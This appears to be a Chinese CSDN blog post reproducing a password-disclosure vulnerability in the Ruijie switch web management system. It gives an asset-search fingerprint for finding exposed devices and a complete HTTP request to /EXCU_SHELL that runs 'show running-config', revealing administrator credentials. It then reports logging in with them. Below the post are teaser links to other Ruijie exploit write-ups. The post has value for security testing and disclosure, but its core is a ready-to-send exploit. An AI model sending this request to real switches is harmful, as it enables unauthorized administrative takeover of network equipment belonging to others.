锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞

最新推荐文章于 2025-01-27 23:26:33 发布

「已注销」

最新推荐文章于 2025-01-27 23:26:33 发布

阅读量1.2k

点赞数

CC 4.0 BY-SA版权

文章标签：前端 web安全

本文链接：https://blog.csdn.net/qq_33331244/article/details/132852679

漏洞复现专栏收录该内容

57 篇文章 ¥39.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了锐捷交换机WEB管理系统EXCU_SHELL存在的密码信息泄漏漏洞，攻击者能获取管理员账号密码并以管理员权限登录。涉及锐捷交换机特定版本，并提供了漏洞复现步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、漏洞简介

锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。

二、影响版本

锐捷交换机 WEB 管理系统

三、资产测绘

hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"
登录页面

四、漏洞复现

GET /EXCU_SHELL HTTP/1.1
Cmdnum: 1
Command1: show running-config
Confirm1: n
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

在这里插入图片描述使用获取的账号密码成功登录系统

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞（含批量验证poc）

weixin_43567873的博客

04-15

571

锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞（含批量验证poc）

锐捷EWEB路由器 auth 远程命令执行漏洞

weixin_43567873的博客

03-13

658

锐捷EWEB路由器 auth 远程命令执行漏洞

参与评论您还未登录，请先登录后发表或查看评论

锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现

大大怪将军，你来啦！

06-11

1429

锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期：2021-09-19漏洞编号：CNVD-2021-09650危害等级：高危漏洞描述：锐捷NBR路由器存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权。

锐捷S2126系列交换机使用Web管理界面

01-03

锐捷S2126系列交换机使用Web管理界面

[转]网络的核心所在交换机漏洞全面了解

weixin_33801856的博客

09-27

281

本文转自:http://netsecurity.51cto.com/art/200705/47465.htm 原问如下: IDC报告显示，交换机市场近年来一直保持着较高的增长势头，到2009年市场规模有望达到15.1亿美元。交换机在企业网中占有重要的地位，通常是整个网络的核心所在，这一地位使它成为黑客入侵和病毒肆虐的重点对象，为保障自身网络安全，企业有必要对局域网上的交换机漏洞进行全面了解。以...

锐捷 Smartweb管理系统密码信息泄露漏洞

孤桜懶契

04-10

2192

漏洞描述 i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。漏洞影响 s ✅锐捷网络股份有限公司无线smartweb管理系统空间测绘 d ⭕FOFA：title="无线smartWeb--登录页面" 漏洞复现 ✅访问首页，存在账号guest/guest登陆而且响应中包含了 admin密码的base64加密，直接全局搜索admin可以看到访问未授权路径/web/xml/webuser-auth.

交换机漏洞全面了解

软体疯子专栏

04-02

1698

IDC报告显示，交换机市场近年来一直保持着较高的增长势头，到2009年市场规模有望达到 15.1亿美元。交换机在企业网中占有重要的地位，通常是整个网络的核心所在，这一地位使它成为黑客入侵和病毒肆虐的重点对象，为保障自身网络安全，企业有必要对局域网上的交换机漏洞进行全面了解。以下是利用交换机漏洞的五种攻击手段。　　VLAN跳跃攻击　　虚拟局域网(VLAN)是对广播域进行分段的方法。VLAN还经

项目实战--制作web管理锐捷交换机(七)

小人物的博客

04-29

809

第七天这是我今天主要做的界面，通过background-color:rgb(255,255,255,0.2);这个css属性将form表单设计了出来，外阴影是通过box-shadow这个css属性弄的，下面是我的代码 <?php session_start(); ?> <html> <head> <meta charset="gb2312"&...

网络的核心所在　深入了解交换机漏洞

weixin_34291004的博客

04-05

174

IDC报告显示，交换机市场近年来一直保持着较高的增长势头，到2009年市场规模有望达到15.1亿美元。交换机在企业网中占有重要的地位，通常是整个网络的核心所在，这一地位使它成为******和病毒肆虐的重点对象，为保障自身网络安全，企业有必要对局域网上的交换机漏洞进行全面了解。以下是利用交换机漏洞的五种***手段。 < B>VLAN跳跃*** 虚...

锐捷RG-UAC敏感信息泄露

qq_44877321的博客

02-14

318

锐捷漏洞复现

交换机漏洞

weixin_34362875的博客

07-27

276

可以发送并接收这些BPDU，以确定哪个交换机拥有最低的网桥ID，拥有最低网桥ID的那个交换机成为根网桥(Root Bridge)。根网桥好比是小镇上的社区杂货店，每个小镇都需要一家杂货店，而每个市民也需要确定到达杂货店的最佳路线。比最佳路线来得长的路线不会被使用，除非主通道出现阻塞。根网桥的工作方式很相似。其他每个交换机确定返回根网桥的最佳路线，根据成本来进行这种...

锐捷交换机管理（管理指令和配置指令）

04-06

锐捷交换机管理指令和配置指令，需要的可以下载来看看

锐捷网络破解

08-29

替换掉原EXE文件，支持WIFI共享，特别适合校园网用户，一台电脑上网，全寝室都能收到笔记本发出的WIFI信号。支持安装和IPHONE。

锐捷EWEB网管系统RCE漏洞

一个努力学习网安的小牛马

05-11

1920

锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件，以"数据时代创新网管与信息安全"为口号，定位于终端安全、IT运营及企业服务化管理统一解决方案。使用cookie向/flow_control_pi/flwo.control.php?用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie。在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数。

锐捷NBR路由器 EWEB网管系统远程命令执行漏洞 + GetShell